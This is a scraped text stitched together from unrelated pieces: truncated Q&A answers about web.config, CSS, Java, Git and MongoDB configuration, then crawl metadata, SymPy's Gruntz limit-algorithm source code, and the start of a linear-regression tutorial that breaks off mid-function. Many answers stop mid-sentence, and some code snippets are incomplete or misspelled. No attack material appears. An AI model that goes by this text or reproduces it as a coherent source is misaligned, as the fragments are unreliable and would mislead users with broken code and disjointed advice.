messageSecurityVersion="WSSecurity11WSTrustFebruary2005WSSecureConversationFebruary2005WSSecurityPolicy11BasicSecurityProfile10"> <secureConversationBootstrap authenticationMode="UserNameForSslNegotiated" messageSecurityVersion="WSSecurity11WSTrustFebruary2005WSSecureConversationFebruary2005WSSecurityPolicy11BasicSecurityProfile10" /> </security> <textMessageEncoding /> <httpTransport /> </binding> &l You have an error in the onclick part of the a tag, see the url begins with:: If you are clicking the link on the page, onclick() is executed. If you are clicking the link in the page source - href is used and the link there is valid. I think it is a NullPointer: protected static Properties props; // << NULL public void onModuleLoad() { loadProps(); // props is still NULL buildUI(); } void loadProps() { // props is still NULL props.set("scarsa manutenzione manto stradale", "images/red.png"); // BANG! [...] By the way: Why did you make props static? There is only one instance of you EntryPoint. So no state can be shared. Make sure you specified App Domain and Site URL. Those have to point to the server where your Share Feed Dialog will be triggered from. As for testing it can point to local host. Example: App Domain: localhost Site URL: Good luck! Marta Try using a media query, selecting only webkit specific stuff such as: @media screen and (-webkit-min-device-pixel-ratio:0) { /* Your CSS */ } This query checks the device pixel ratio in webkit. Safari & Chrome are the only big browsers using webkit, so this will not affect FireFox or IE. Kernel versions are different.. arm926 built for kernel version 2.6.32 Ezsdk 6.0 for beagleboard XM uses kernel version 3.3.7 I think, need to use open source library () Applets are not allowed to do a number of things, including file I/O and various networking tasks; as your applet is trying to do one. You may need to sign you applet. Check this reference I found the answer in a post here: how to add files in web.config transformation process? In your "App Data" folder you'll find your publish profiles you created and can right click on them to add a config transform file. Your function only accepts one argument (numArray), not three—this is why your call to getMaxOfArray is failing. If you are writing a one-liner, you should use call instead of apply for a series of parameters rather than an array, as so: Math.max.apply(null, [1, 3, 9]); Math.max.call(null, 1, 3, 9); For a function, you can use the arguments object for a variable number of parameters, if you do not want the user to pass an array. Here's how you would go about doing it this way. (Note that I still call apply here, because I store all of the arguments called by the user into an array.) function getMaxOfArguments() { var parameters = 1 <= arguments.length ? [].slice.call(arguments, 0) : []; return Math.max.apply(null, parameters); } Now, your second function call should wo The behavior you describe sounds like you are calling .ToString() on an Image object. Images are not strings, so the .ToString() method will perform the default behavior of writing the class name and a property like System.Byte[] to the label. Darren's link in the comments shows how to write an array of bytes to the response stream, though if you really really want to keep it a string and the image size is small you can also try using the data:uri format for image tags: stackoverflow.com/questions/6826390/... I'd go with the custom httphandler to write to stream, since the data uri format might not be supported with all browsers and has a size limit. But, if you're just serving small images to modern browsers, it may be for you. I remember having the same issue when using transaction.add. From then on one of my base rules was to never user transaction.add again and use transaction.replace instead. Try it, it should work. I guess you should think fo a better approach than iterating over the EditTexts with getChildAt() to collect all the value. I take it that the user can change the values in the EditTexts, you can have an Array of size 30 of Values and everytime the user enters / changes a value you change the according value in the Array. Use a listener that changes the values in your Array like this. you are aware that in: .mainnav ul li a:link,.mainnav ul li a:visited there are double padding decalarations? padding:4px; padding: 0 0.73em; You can combine those: padding: 4px 0.73em; Seems that the issue with the navigation list is that there is too much spacing in between them in combination with the amount of items. I there are too much items, the normal behavior is the wrapping, you could decrease spacing, font-size to fix this. At first look it seems like a possibility of 2 issues ContactManager object which you are trying to save is null Your variable name 'Contact' is incorrect, it should be 'contact' (some hibernate thingy) Where is your hbm.xml file ? There may be a reference of 'Contact' the class in that file still around somewhere Edit Solutions Put a if (developer != null) before your 'save(developer)' Rename Contact to contact Put the hbm file contents on the question, without that cant review the mapping Hope it clear now. Edit 2 : Do a clean build. Its possible your build is not updated. .NET uses BStrings, which are length-prefixed and null-terminated. So if the first character in RecievedString is the null character (''), then it will not be printed, since strings end at their first null character. Homebrew mainly uses built-in tools, so formulae generally should be built against system Python anyway. You shouldn't have any problem with them unless you override system Python with Homebrew ones (which is generally not recommended unless you need to do something special). Without resorting to xml manipulation, the following answer may help you Add a 'clear' element to WebDAV authoringRules using powershell There are several ways and depending on what's your deployment structure it may make sense to pick one or another. META-INF/ejb-jar.xml - this is used when the EJBs are inside their own JAR which in turn is part of an EAR. WEB-INF/ejb-jar.xml - this is used when EJBs are part of a WAR. annotations - many configuration options can be specified through annotations on the bean class itself. The above are configurations specific to EJBs. However, some of the resources you mention may be specified in both ejb-jar.xml and web.xml. For reference, try reading the schema file - it's fairly well documented, or something like this. If it is a system wide config, each user can override a config value in his/her global and local settings. But there is no easy way to "deactivate" a setting in a lower config file. Even set it to "" generally has unintended consequences. That very topic was discussed in April 2010. For instance, deactivating the send-email option: True, after thinking a bit about this using no value to unset is a horrible, horrible hack. git-send-email should be corrected to not only check that there is value from config or command line option, but also that it is sane (i.e. non-empty, or simply true-ish if we say that smtpuser = "0" is not something we need to worry about supporting). That would be true for any setting: the diff.c#run_diff_cmd() function will attempt to run an external diff i Issue resolved with following steps (thanks to Karl Seguin's 'The Little MongoDB Book'). If you installed MongoDB via the download package from mongodb.org, you have to create create your own config file in /bin. Follow the instructions below (copied from Karl Seguin's book): download package unzip package Create a new text file in the bin subfolder named mongodb.config (if you have permission issues saving the file, save it first to your desktop then move file into folder). Add a single line to your mongodb.config: dbpath=PATH_TO_WHERE_YOU_WANT_TO_STORE_YOUR_DATABASE_FILES. For example, on Windows you might do dbpath=c:mongodbdata and on Linux you might do dbpath=/var/lib/ mongodb/data. Make sure the dbpath you specified exists Launch mongod with the --config /path/to/your/mongodb you can have either a web.config for a web project or an app.config for an application. as alternative you can load in custom configuration files see also No Git config includes operate: as if its contents had been found at the location of the include directive ref That means you can't override/remove the include itself, as as soon as it's found the contents of the included file are injected/loaded. You can of course override the settings it contains in a more specific config file: # ~/.git.config.team [user] name = name Locally, via git config user.name nic # /some/project/.git/config [user] name = alias Yielding: /some/project $ git config user.name alias /some/project $ it seems you create form at wrong place, try to get main controller first: $CI =$ get_instence(); 'rules'=>'required|min_length['.$CI->config->item('min_password_length', 'ion_auth').']' start.py ... options.ConfigFile = args.filename ... options.py from ConfigReader import getConfigValue as getVal, ConfigFile def getTest(): Test = getVal('main', 'test') return Test ConfigReader.py import os import ConfigParser ConfigFile='default.cfg' def config(): cfg = ConfigParser.ConfigParser() for f in set(['default.cfg',ConfigFile]): Try changing the ConfigurationSaveMode from ConfigurationSaveMode.Minimal to ConfigurationSaveMode.Modified Modified only saves the properties that you have changed. From MSDN:. Took me a while to find the problem. It seems the collections don't know which elementitems to look for in the config file. Therefore Adding an ItemName at the Collections ConfigurationCollection-Attribute will do the trick: ... [ConfigurationCollection(typeof(LoggerRegistration), AddItemName = "LoggerRegistration")] public class LoggerRegistrations : ConfigurationElementCollection { ... . ... [ConfigurationCollection(typeof(LogMapperElement), AddItemName = "LogMapper")] public class LogMappers : ConfigurationElementCollection ... The ItemName must be set to the tagname used in the config file for the collections elements, and be passed via 'AddItemName="..."' App.config that resides in a Class Library project would not be loaded (at least not without extra effort), the only configuration loaded by the framework is the Client configuration (i.e the Web.config of a project that references and uses your Class Library). See this answer for possible solutions. A web application will use web.config. Keep your app settings inside that. A dll specic config file is not required. A windows application will use App.config while a web application will use web.config. If you use your dll in a windows or console application put the setting in app.config. Dlls will always use the config file of the application they are loaded into. If you want to have a dll specific config file, you will have to load it yourself. The syntax you're implying is impossible. I can think of two ways for you to achieve this: Preload all the codes: var preloadedCodeArray = ["<%= ConfigurationManager.AppSettings[line1] %>", "<%= ConfigurationManager.AppSettings[line2] %>", "<%= ConfigurationManager.AppSettings[line3] %>"]; Or via a method that returns the wanted string: var preloadedCodeArray = ["<%= GetAllConfigurationLines() %>"]; Use AJAX calls to retrieve the wanted line (this would require of you to build a specific http-handler for handling the calls and returning the wanted code line). something in the form of: function getConfigLine(lineNum) { var config; $.ajax("../WebConfigLineHandle.ashx?line=" + lineNum, { com No, the processor directives are not available in the web.config or app.config files. Edited to add: These files are not actually compiled, and the #debug preprocessor value is used during compilation to tell the compiler what to do. "requirejs" is just an alias to the same API, since "require" is used by other libraries. From the documentation: If you just want to load some JavaScript files, use the require() API. If there is already a require() in the page, you can use requirejs() to access the RequireJS API for loading scripts. Even though it makes no technical difference, just by convention I would stay with require.config unless you have a naming conflict with some other module loader. Results as of 6-Jun-2013: (609 results) (258 results) In a word: You can't... However, if you already have packages.configin your repository, then it won't be ignored even if svn ignore is set to *.config. You can't ignore stuff already in the repository. However, from what you want, it sounds like you can use my pre-commit hook for finer control over your situation. My hook takes a list of rules specified in a control file. For file rules, the last rule that matches the file's name is the access they're granted. In your situation, you would have two rules: [FILE Configuration files must be named "packages.config"] file = **/*.config access = no-add users = @ALL [FILE Configuration files must be named "packages.config"] file = **/packages.config access = read-write users = @ALL If someone tried to add bob.config, to the repository, my f The following works for me: test.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="" xmlns:xsi="" xmlns:context="" xmlns:dwr="" xmlns:mongo="" xsi:schemaLocation=" I don't think you need to worry about resource or performance in this situation. You should be most concerned on the functionality that you want and your users expect. If they are clicking a list item and open up say a detailed Activity for that list item then they press the back button then they probably expect to return to that list. If you call finish() then the user will return to the Activity before this one or if there are no others then they will exit the app. Is that what you want? So with what little I know about your app I would say remove finish() public void return_to_config(View view){ Intent intent = new Intent(this, ConfigActivity.class); startActivity(intent); } But if the user doesn't expect to return here when pressing "Back" button then keep it in there My solution to this was that I was looking in the wrong place. I took these steps to resolve my issue: From SQL Server Configuration Manager, I chose Protocols for MSSQLSERVER, then right clicked on that and chose Properties. From there I found the certificates tab. Choosing the Cert was easy - done. On restarting MSSQL I got an error and it wouldn't start. Quick Bing and traced it to the fact that the account MSSQL is running on didn't have access to that cert. I went to the Cert MMC and then from there I chose the cert, right clicked and went to All Tasks->Manage Private Keys. From there I simply gave access rights to the SQL service account. Restarted the SQL service and voila! Problem solved. Usually the mvc configuration(/WEB-INF/mvc-config.xml) contains the the beans that are needed by the controller layer (e.g. the controllers, view resolvers ...) The application configuration(classpath:spring/application-config.xml) is for the model layer (here you can define daos, services...) You can use location element example <location path="subdir1"> <system.web> <authorization> <allow users ="*" /> </authorization> </system.web> </location> As no other solutions were suggested, I created a function to modify web.config manually and copy data from smaller configs. Just in case someone finds it useful or suggests a better approach: # Changes web.config: adds into system.serviceModel group data for binding and for endpoint for the webservice Function add-config-source { Param($configFile) if(($configFile -eq "") -or ($configFile -eq $null)) { $errors = $errors + " Error: path to webservice configuration file was not found. "; } # get data from the web service config file $webServiceConfigXml = [xml](get-content $configFile) # cloning elements that we need $bindingNodeClone = $webServiceConfigXml.SelectSingleNode("//binding").Clone(); $endpointNodeClone = $webService
http://www.w3hello.com/questions/rs-reconfig-not-works-it-still-shows-the-original-config
CC-MAIN-2018-17
refinedweb
2,797
57.27
Lead Image © Lucy Baldwin, 123RF.com Thrashing the data cache for fun and profit Ducks in a Row In the past [1], I discussed how instruction cache misses can completely ruin your CPU's day when it comes to execution speed by stalling processing for thousands or even millions of cycles while program text is being retrieved from slower caches, or even from (gosh!) RAM [2] [3]. Now the time has come to turn your attention to the data cache: Where large enough datasets are involved, spatial locality and cache-friendly algorithms are among the first optimizations you should employ. Three Times Slower Compare the code presented in Listings 1 and 2. You might use diff [4] to verify that the only difference is in the order of the i and j variables in the array lookup. Listing 1 increments 100 million integers, scanning the array row by row, whereas Listing 2 increments the 10,000 elements of a column before moving to the next column. Listing 1 row.c #include <stdio.h> #define SIZE 10000 ** int array[SIZE][SIZE] = {0}; int main() { for (int i = 0; i < SIZE; i++) for (int j = 0; j < SIZE; j++) array[i][j]++; return 0; } Listing 2 column.c #include <stdio.h> #define SIZE 10000 ** int array[SIZE][SIZE] = {0}; int main() { for (int i = 0; i < SIZE; i++) for (int j = 0; j < SIZE; j++) array[j][i]++; return 0; } Both listings do exactly the same thing, proceeding in what is called row-major (Listing 1) or column-major (Listing 2) order [5]. To see how this plays out in practice, compile both programs: gcc column.c -o column gcc row.c -o row Next, run and time the execution of these logically equivalent access strategies: $ time ./row real 0m1.388s user 0m0.943s sys 0m0.444s ** $ time ./column real 0m4.538s user 0m4.068s sys 0m0.468s The experiment shows the column-major code taking three and a half times longer to execute than its row-major counterpart. That significant result is partially explained by how C, C++, and other languages "flatten" two-dimensional arrays into the one-dimensional address space exposed by RAM. As shown in Figure 1, individual rows line up sequentially in memory, something that can be easily shown with a simple program printing the dereferenced value of an incrementing pointer (Listing 3). This new program uses C pointer arithmetic (don't try this at home, as the MythBusters would say, because it is generally considered poor practice) to access and print every location in a small 2D array by linearly accessing memory. C really represents two-dimensional arrays as arrays of arrays, and lays them out in row-major fashion (i.e., row by row in memory). Listing 3 inspect.c #include <stdio.h> ** int a[4][5] = { // array of 4 arrays of 5 ints each, a 4x5 matrix { 1, 2, 3, 4, 5 }, // row 0 initialized to 1, 2, 3, 4, 5 { 6, 7, 8, 9, 10 }, // row 1 initialized to 6, 7, 8, 9 ... }; // rows 2 onwards initialized to zeros ** int main() { int *p = a; for(int i=0; i < 20; i++) printf("%d, ", *p++); printf("\b\b \n"); // erasing the trailing comma and adding a newline return 0; } Running the third program, $ ./inspect 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 $ indeed produces the output one would expect. The Right Neighborhood With every row of the array weighing in at roughly 40KB (10,000 entries of 32 bits), the difference in access time reveals the nature of the underlying machine. Accessing the array in the natural order of the programming language (implementation choices may differ here, with Fortran and Matlab choosing column-major layouts) leverages the spatial locality of an access pattern, reading locations contiguous in physical memory. Conversely, using the wrong strategy produces code constantly looking up memory locations that are 40KB apart. The first approach is cache-friendly, whereas the latter approach repeatedly evicts cache lines that were just loaded yet used to process but a single value. The more linear the memory access pattern, the easier it is for the CPU to be ready for operations, with data already in the cache when called. Memory layout and access patterns matter, and a stark demonstration of the difference between the two approaches is provided by Figure 2. The perf stat command [6] executes the command requested while gathering statistics from the CPU's performance counters. Switching between the row-major and column-major access patterns resulted in a 20-fold increase in L1 cache misses, spiking from 13 million to 273 million! The Cachegrind module of valgrind [7] measures how a program interacts with an ideal cache hierarchy by simulating a machine with independent first-level instruction and data caches (I1 and D1), backed by a unified second-level cache (L2). Although Cachegrind requires tuning to match the size of a CPU's caches, the independence of its simulations from any other process running in the system, reproducible results, and compatibility with virtual environments makes it the tool of choice when studying a cache performance issue. Figure 3 shows the results of the run, producing a 16-fold increase in data cache misses, up from 6 million to 100 million events. Note how the row-major approach delivered a near-perfect result, with D1 cache misses coming in under one percent. Fully utilizing the data loaded from the slower storage medium (RAM in this case) is a common optimization pattern. Swapping to disk is, of course, the worst case scenario, with 13,700 times the latency of the L1 cache. The situation whereupon memory pages are being offloaded to the swap device after a single variable access and then reloaded to access the next location is known as disk thrashing. RAM is loaded by the CPU in cache lines [8], and data is loaded from disk in full pages; whenever possible, make full use of all their data before moving on to the next. Infos - "Heavy Rotation" by Federico Lucifredi, ADMIN , issue 14, 2013, pg. 88 - Visualization of L1, L2, RAM, and disk latencies: - Interactive visualization of cache speeds: - diff (1) man page: - Row- and column-major order: - perf stat (1) man page: - Cachegrind manual: - CPU cache: Buy this article as PDF (incl. VAT)
https://www.admin-magazine.com/Archive/2019/54/Thrashing-the-data-cache-for-fun-and-profit/(tagID)/24
CC-MAIN-2020-16
refinedweb
1,064
59.53
/ """ Limits ====== Implemented according to the PhD thesis, which contains very thorough descriptions of the algorithm including many examples. We summarize here the gist of it. All functions are sorted according to how rapidly varying they are at infinity using the following rules. Any two functions f and g can be compared using the properties of L: L=lim log|f(x)| / log|g(x)| (for x -> oo) We define >, < ~ according to:: 1. f > g .... L=+-oo we say that: - f is greater than any power of g - f is more rapidly varying than g - f goes to infinity/zero faster than g 2. f < g .... L=0 we say that: - f is lower than any power of g 3. f ~ g .... L!=0, +-oo we say that: - both f and g are bounded from above and below by suitable integral powers of the other Examples ======== :: 2 < x < exp(x) < exp(x**2) < exp(exp(x)) 2 ~ 3 ~ -5 x ~ x**2 ~ x**3 ~ 1/x ~ x**m ~ -x exp(x) ~ exp(-x) ~ exp(2x) ~ exp(x)**2 ~ exp(x+exp(-x)) f ~ 1/f So we can divide all the functions into comparability classes (x and x^2 belong to one class, exp(x) and exp(-x) belong to some other class). In principle, we could compare any two functions, but in our algorithm, we don't compare anything below the class 2~3~-5 (for example log(x) is below this), so we set 2~3~-5 as the lowest comparability class. Given the function f, we find the list of most rapidly varying (mrv set) subexpressions of it. This list belongs to the same comparability class. Let's say it is {exp(x), exp(2x)}. Using the rule f ~ 1/f we find an element "w" (either from the list or a new one) from the same comparability class which goes to zero at infinity. In our example we set w=exp(-x) (but we could also set w=exp(-2x) or w=exp(-3x) ...). We rewrite the mrv set using w, in our case {1/w, 1/w^2}, and substitute it into f. Then we expand f into a series in w:: f = c0*w^e0 + c1*w^e1 + ... + O(w^en), where e0<e1<...<en, c0!=0 but for x->oo, lim f = lim c0*w^e0, because all the other terms go to zero, because w goes to zero faster than the ci and ei. So:: for e0>0, lim f = 0 for e0<0, lim f = +-oo (the sign depends on the sign of c0) for e0=0, lim f = lim c0 We need to recursively compute limits at several places of the algorithm, but as is shown in the PhD thesis, it always finishes. Important functions from the implementation: compare(a, b, x) compares "a" and "b" by computing the limit L. mrv(e, x) returns list of most rapidly varying (mrv) subexpressions of "e" rewrite(e, Omega, x, wsym) rewrites "e" in terms of w leadterm(f, x) returns the lowest power term in the series of f mrv_leadterm(e, x) returns the lead term (c0, e0) for e limitinf(e, x) computes lim e (for x->oo) limit(e, z, z0) computes any limit by converting it to the case x->oo All the functions are really simple and straightforward except rewrite(), which is the most difficult/complex part of the algorithm. When the algorithm fails, the bugs are usually in the series expansion (i.e. in SymPy) or in rewrite. This code is almost exact rewrite of the Maple code inside the Gruntz thesis. Debugging --------- Because the gruntz algorithm is highly recursive, it's difficult to figure out what went wrong inside a debugger. Instead, turn on nice debug prints by defining the environment variable SYMPY_DEBUG. For example: [user@localhost]: SYMPY_DEBUG=True ./bin/isympy In [1]: limit(sin(x)/x, x, 0) limitinf(_x*sin(1/_x), _x) = 1 +-mrv_leadterm(_x*sin(1/_x), _x) = (1, 0) | +-mrv(_x*sin(1/_x), _x) = set([_x]) | | +-mrv(_x, _x) = set([_x]) | | +-mrv(sin(1/_x), _x) = set([_x]) | | +-mrv(1/_x, _x) = set([_x]) | | +-mrv(_x, _x) = set([_x]) | +-mrv_leadterm(exp(_x)*sin(exp(-_x)), _x, set([exp(_x)])) = (1, 0) | +-rewrite(exp(_x)*sin(exp(-_x)), set([exp(_x)]), _x, _w) = (1/_w*sin(_w), -_x) | +-sign(_x, _x) = 1 | +-mrv_leadterm(1, _x) = (1, 0) +-sign(0, _x) = 0 +-limitinf(1, _x) = 1 And check manually which line is wrong. Then go to the source code and debug this function to figure out the exact problem. """ from __future__ import print_function, division from sympy.core import Basic, S, oo, Symbol, I, Dummy, Wild, Mul from sympy.functions import log, exp from sympy.series.order import Order from sympy.simplify.powsimp import powsimp from sympy import cacheit from sympy.core.compatibility import reduce from sympy.utilities.timeutils import timethis timeit = timethis('gruntz') from sympy.utilities.misc import debug_decorator as debug[docs]def compare(a, b, x): """Returns "<" if a<b, "=" for a == b, ">" for a>b""" # log(exp(...)) must always be simplified here for termination la, lb = log(a), log(b) if isinstance(a, Basic) and a.func is exp: la = a.args[0] if isinstance(b, Basic) and b.func is exp: lb = b.args[0] c = limitinf(la/lb, x) if c == 0: return "<" elif c.is_infinite: return ">" else: return "="[docs]class SubsSet(dict): """. """ def __init__(self): self.rewrites = {} def __repr__(self): return super(SubsSet, self).__repr__() + ', ' + self.rewrites.__repr__() def __getitem__(self, key): if not key in self: self[key] = Dummy() return dict.__getitem__(self, key) def do_subs(self, e): for expr, var in self.items(): e = e.subs(var, expr) return e@debug[docs] def meets(self, s2): """Tell whether or not self and s2 have non-empty intersection""" return set(self.keys()).intersection(list(s2.keys())) != set()[docs] def union(self, s2, exps=None): """Compute the union of self and s2, adjusting exps""" res = self.copy() tr = {} for expr, var in s2.items(): if expr in self: if exps: exps = exps.subs(var, res[expr]) tr[var] = res[expr] else: res[expr] = var for var, rewr in s2.rewrites.items(): res.rewrites[var] = rewr.subs(tr) return res, expsdef copy(self): r = SubsSet() r.rewrites = self.rewrites.copy() for expr, var in self.items(): r[expr] = var return r[docs]def mrv(e, x): """Returns a SubsSet of most rapidly varying (mrv) subexpressions of 'e', and e rewritten in terms of these""" e = powsimp(e, deep=True, combine='exp') if not isinstance(e, Basic): raise TypeError("e should be an instance of Basic") if not e.has(x): return SubsSet(), e elif e == x: s = SubsSet() return s, s[x] elif e.is_Mul or e.is_Add: i, d = e.as_independent(x) # throw away x-independent terms if d.func != e.func: s, expr = mrv(d, x) return s, e.func(i, expr) a, b = d.as_two_terms() s1, e1 = mrv(a, x) s2, e2 = mrv(b, x) return mrv_max1(s1, s2, e.func(i, e1, e2), x) elif e.is_Pow: b, e = e.as_base_exp() if e.has(x): return mrv(exp(e * log(b)), x) else: s, expr = mrv(b, x) return s, expr**e elif e.func is log: s, expr = mrv(e.args[0], x) return s, log(expr) elif e.func is exp: # We know from the theory of this algorithm that exp(log(...)) may always # be simplified here, and doing so is vital for termination. if e.args[0].func is log: return mrv(e.args[0].args[0], x) # if a product has an infinite factor the result will be # infinite if there is no zero, otherwise NaN; here, we # consider the result infinite if any factor is infinite li = limitinf(e.args[0], x) if any(_.is_infinite for _ in Mul.make_args(li)): s1 = SubsSet() e1 = s1[e] s2, e2 = mrv(e.args[0], x) su = s1.union(s2)[0] su.rewrites[e1] = exp(e2) return mrv_max3(s1, e1, s2, exp(e2), su, e1, x) else: s, expr = mrv(e.args[0], x) return s, exp(expr) elif e.is_Function: l = [mrv(a, x) for a in e.args] l2 = [s for (s, _) in l if s != SubsSet()] if len(l2) != 1: # e.g. something like BesselJ(x, x) raise NotImplementedError("MRV set computation for functions in" " several variables not implemented.") s, ss = l2[0], SubsSet() args = [ss.do_subs(x[1]) for x in l] return s, e.func(*args) elif e.is_Derivative: raise NotImplementedError("MRV set computation for derviatives" " not implemented yet.") return mrv(e.args[0], x) raise NotImplementedError( "Don't know how to calculate the mrv of '%s'" % e)[docs]def mrv_max3(f, expsf, g, expsg, union, expsboth, x): ""]. """ if not isinstance(f, SubsSet): raise TypeError("f should be an instance of SubsSet") if not isinstance(g, SubsSet): raise TypeError("g should be an instance of SubsSet") if f == SubsSet(): return g, expsg elif g == SubsSet(): return f, expsf elif f.meets(g): return union, expsboth c = compare(list(f.keys())[0], list(g.keys())[0], x) if c == ">": return f, expsf elif c == "<": return g, expsg else: if c != "=": raise ValueError("c should be =") return union, expsboth[docs]def mrv_max1(f, g, exps, x): "". """ u, b = f.union(g, exps) return mrv_max3(f, g.do_subs(exps), g, f.do_subs(exps), u, b, x)@debug @cacheit @timeit[docs]def sign(e, x): """.] """ from sympy import sign as _sign if not isinstance(e, Basic): raise TypeError("e should be an instance of Basic") if e.is_positive: return 1 elif e.is_negative: return -1 elif e.is_zero: return 0 elif not e.has(x): return _sign(e) elif e == x: return 1 elif e.is_Mul: a, b = e.as_two_terms() sa = sign(a, x) if not sa: return 0 return sa * sign(b, x) elif e.func is exp: return 1 elif e.is_Pow: s = sign(e.base, x) if s == 1: return 1 if e.exp.is_Integer: return s**e.exp elif e.func is log: return sign(e.args[0] - 1, x) # if all else fails, do it the hard way c0, e0 = mrv_leadterm(e, x) return sign(c0, x)@debug @timeit @cacheit[docs]def limitinf(e, x): """Limit e(x) for x-> oo""" #rewrite e in terms of tractable functions only e = e.rewrite('tractable', deep=True) if not e.has(x): return e # e is a constant if e.has(Order): e = e.expand().removeO() if not x.is_positive: # We make sure that x.is_positive is True so we # get all the correct mathematical behavior from the expression. # We need a fresh variable. p = Dummy('p', positive=True, finite=True) e = e.subs(x, p) x = p c0, e0 = mrv_leadterm(e, x) sig = sign(e0, x) if sig == 1: return S.Zero # e0>0: lim f = 0 elif sig == -1: # e0<0: lim f = +-oo (the sign depends on the sign of c0) if c0.match(I*Wild("a", exclude=[I])): return c0*oo s = sign(c0, x) #the leading term shouldn't be 0: if s == 0: raise ValueError("Leading term should not be 0") return s*oo elif sig == 0: return limitinf(c0, x) # e0=0: lim f = lim c0def moveup2(s, x): r = SubsSet() for expr, var in s.items(): r[expr.subs(x, exp(x))] = var for var, expr in s.rewrites.items(): r.rewrites[var] = s.rewrites[var].subs(x, exp(x)) return r def moveup(l, x): return [e.subs(x, exp(x)) for e in l] @debug @timeit[docs]def calculate_series(e, x, logx=None): """ Calculates at least one term of the series of "e" in "x". This is a place that fails most often, so it is in its own function. """ from sympy.polys import cancel for t in e.lseries(x, logx=logx): t = cancel(t) if t.simplify(): break return t@debug @timeit @cacheit[docs]def mrv_leadterm(e, x): """Returns (c0, e0) for e.""" Omega = SubsSet() if not e.has(x): return (e, S.Zero) if Omega == SubsSet(): Omega, exps = mrv(e, x) if not Omega: # e really does not depend on x after simplification series = calculate_series(e, x) c0, e0 = series.leadterm(x) if e0 != 0: raise ValueError("e0 should be 0") return c0, e0 if x in Omega: #move the whole omega up (exponentiate each term): Omega_up = moveup2(Omega, x) e_up = moveup([e], x)[0] exps_up = moveup([exps], x)[0] # NOTE: there is no need to move this down! e = e_up Omega = Omega_up exps = exps_up # # The positive dummy, w, is used here so log(w*2) etc. will expand; # a unique dummy is needed in this algorithm # # For limits of complex functions, the algorithm would have to be # improved, or just find limits of Re and Im components separately. # w = Dummy("w", real=True, positive=True, finite=True) f, logw = rewrite(exps, Omega, x, w) series = calculate_series(f, w, logx=logw) return series.leadterm(w)[docs]def build_expression_tree(Omega, rewrites): r""". """ class Node: def ht(self): return reduce(lambda x, y: x + y, [x.ht() for x in self.before], 1) nodes = {} for expr, v in Omega: n = Node() n.before = [] n.var = v n.expr = expr nodes[v] = n for _, v in Omega: if v in rewrites: n = nodes[v] r = rewrites[v] for _, v2 in Omega: if r.has(v2): n.before.append(nodes[v2]) return nodes@debug @timeit[docs]def rewrite(e, Omega, x, wsym): """e(x) ... the function Omega ... the mrv set wsym ... the symbol which is going to be used for w Returns the rewritten e in terms of w and log(w). See test_rewrite1() for examples and correct results. """ from sympy import ilcm if not isinstance(Omega, SubsSet): raise TypeError("Omega should be an instance of SubsSet") if len(Omega) == 0: raise ValueError("Length can not be 0") #all items in Omega must be exponentials for t in Omega.keys(): if not t.func is exp: raise ValueError("Value should be exp") rewrites = Omega.rewrites Omega = list(Omega.items()) nodes = build_expression_tree(Omega, rewrites) Omega.sort(key=lambda x: nodes[x[1]].ht(), reverse=True) # make sure we know the sign of each exp() term; after the loop, # g is going to be the "w" - the simplest one in the mrv set for g, _ in Omega: sig = sign(g.args[0], x) if sig != 1 and sig != -1: raise NotImplementedError('Result depends on the sign of %s' % sig) if sig == 1: wsym = 1/wsym # if g goes to oo, substitute 1/w #O2 is a list, which results by rewriting each item in Omega using "w" O2 = [] denominators = [] for f, var in Omega: c = limitinf(f.args[0]/g.args[0], x) if c.is_Rational: denominators.append(c.q) arg = f.args[0] if var in rewrites: if not rewrites[var].func is exp: raise ValueError("Value should be exp") arg = rewrites[var].args[0] O2.append((var, exp((arg - c*g.args[0]).expand())*wsym**c)) #Remember that Omega contains subexpressions of "e". So now we find #them in "e" and substitute them for our rewriting, stored in O2 # the following powsimp is necessary to automatically combine exponentials, # so that the .subs() below succeeds: # TODO this should not be necessary f = powsimp(e, deep=True, combine='exp') for a, b in O2: f = f.subs(a, b) for _, var in Omega: assert not f.has(var) #finally compute the logarithm of w (logw). logw = g.args[0] if sig == 1: logw = -logw # log(w)->log(1/w)=-log(w) # Some parts of sympy have difficulty computing series expansions with # non-integral exponents. The following heuristic improves the situation: exponent = reduce(ilcm, denominators, 1) f = f.subs(wsym, wsym**exponent) logw /= exponent return f, logw[docs]def gruntz(e, z, z0, dir="+"): """. """ if not isinstance(z, Symbol): raise NotImplementedError("Second argument must be a Symbol") #convert all limits to the limit z->oo; sign of z is handled in limitinf r = None if z0 == oo: r = limitinf(e, z) elif z0 == -oo: r = limitinf(e.subs(z, -z), z) else: if str(dir) == "-": e0 = e.subs(z, z0 - 1/z) elif str(dir) == "+": e0 = e.subs(z, z0 + 1/z) else: raise NotImplementedError("dir must be '+' or '-'") r = limitinf(e0, z) # This is a bit of a heuristic for nice results... we always rewrite # tractable functions in terms of familiar intractable ones. # It might be nicer to rewrite the exactly to what they were initially, # but that would take some work to implement. return r.rewrite('intractable', deep=True)
https://docs.sympy.org/1.0/_modules/sympy/series/gruntz.html
CC-MAIN-2019-09
refinedweb
2,765
67.25
3.2. Linear Regression Implementation from Scratch¶ Now that you understand the key ideas behind linear regression, we can begin to work through a hands-on implementation in code. In this section, we will implement the entire method from scratch, including the data pipeline, the model, the loss function, and the gradient descent optimizer. While modern deep learning frameworks can automate nearly all of this work, implementing things from scratch is the only to make sure that you really know what you are doing. Moreover, when it comes time to customize models, defining our own layers, loss functions, etc., understanding how things work under the hood will prove handy. In this section, we will rely only on ndarray and autograd. Afterwards, we will introduce a more compact implementation, taking advantage of Gluon’s bells and whistles. To start off, we import the few required packages. %matplotlib inline import d2l from mxnet import autograd, np, npx import random npx.set_np() 3.2.1. Generating the Dataset¶ To keep things simple, we will construct an artificial dataset according to a linear model with additive noise. Out task will be to recover this model’s parameters using the finite set of examples contained in our dataset. We will keep the data low-dimensional so we can visualize it easily. In the following code snippet, we generated a dataset containing \(1000\) examples, each consisting of \(2\) features sampled from a standard normal distribution. Thus our synthetic dataset will be an object \(\mathbf{X}\in \mathbb{R}^{1000 \times 2}\). The true parameters generating our data will be \(\mathbf{w} = [2, -3.4]^\top\) and \(b = 4.2\) and our synthetic labels will be assigned according to the following linear model with noise term \(\epsilon\): You could think of \(\epsilon\) as capturing potential measurement errors on the features and labels. We will assume that the standard assumptions hold and thus that \(\epsilon\) obeys a normal distribution with mean of \(0\). To make our problem easy, we will set its standard deviation to \(0.01\). The following code generates our synthetic dataset: # Saved in the d2l package for later use def synthetic_data(w, b, num_examples): """generate y = X w + b + noise""" X 